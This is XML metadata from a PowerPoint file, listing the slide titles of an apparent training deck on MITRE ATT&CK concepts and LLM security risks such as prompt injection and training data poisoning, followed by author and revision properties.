      <vt:lpstr>Exfiltration: Sneaking Out the Backdoor</vt:lpstr>
      <vt:lpstr>Impact – Delivering the Final Blow</vt:lpstr>
      <vt:lpstr>ATT&amp;CK Techniques</vt:lpstr>
      <vt:lpstr>ATT&amp;CK Techniques</vt:lpstr>
      <vt:lpstr>ATT&amp;CK Sub-Techniques</vt:lpstr>
      <vt:lpstr>ATT&amp;CK Subtechniques</vt:lpstr>
      <vt:lpstr>ATT&amp;CK Subtechniques</vt:lpstr>
      <vt:lpstr>ATT&amp;CK Data Source</vt:lpstr>
      <vt:lpstr>ATT&amp;CK Data Source – Example</vt:lpstr>
      <vt:lpstr>ATT&amp;CK Detections</vt:lpstr>
      <vt:lpstr>ATT&amp;CK Detections - Example</vt:lpstr>
      <vt:lpstr>ATT&amp;CK Mitigations</vt:lpstr>
      <vt:lpstr>ATT&amp;CK Mitigations – Examples</vt:lpstr>
      <vt:lpstr>ATT&amp;CK Groups</vt:lpstr>
      <vt:lpstr>ATT&amp;CK Groups - Examples</vt:lpstr>
      <vt:lpstr>ATT&amp;CK Software</vt:lpstr>
      <vt:lpstr>ATT&amp;CK Campaigns</vt:lpstr>
      <vt:lpstr>ATT&amp;CK Campaigns – Example 1</vt:lpstr>
      <vt:lpstr>ATT&amp;CK Campaigns – Example 2</vt:lpstr>
      <vt:lpstr>ATT&amp;CK Relations</vt:lpstr>
      <vt:lpstr>Prompt Injection</vt:lpstr>
      <vt:lpstr>Indirect Prompt Injection: Lab Access</vt:lpstr>
      <vt:lpstr>Insecure Output Handling</vt:lpstr>
      <vt:lpstr>Insecure Output Handling: Lab Access</vt:lpstr>
      <vt:lpstr>Model Denial of Service</vt:lpstr>
      <vt:lpstr>Model Denial of Service</vt:lpstr>
      <vt:lpstr>Training Data Poisoning</vt:lpstr>
      <vt:lpstr>Training Data Poisoning</vt:lpstr>
      <vt:lpstr>Sensitive Information Disclosure</vt:lpstr>
      <vt:lpstr>Plugin Security in LLM</vt:lpstr>
      <vt:lpstr>Excessive Agency</vt:lpstr>
      <vt:lpstr>Overreliance</vt:lpstr>
      <vt:lpstr>Overreliance- Example</vt:lpstr>
      <vt:lpstr>Model Theft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Jatin Parashar</dc:creator>
  <cp:lastModifiedBy>VINEET KUMAR</cp:lastModifiedBy>
  <cp:revision>28</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-16T19:56:53Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-21T10:03:35Z</dcterms:modified>
</cp:coreProperties>
</file>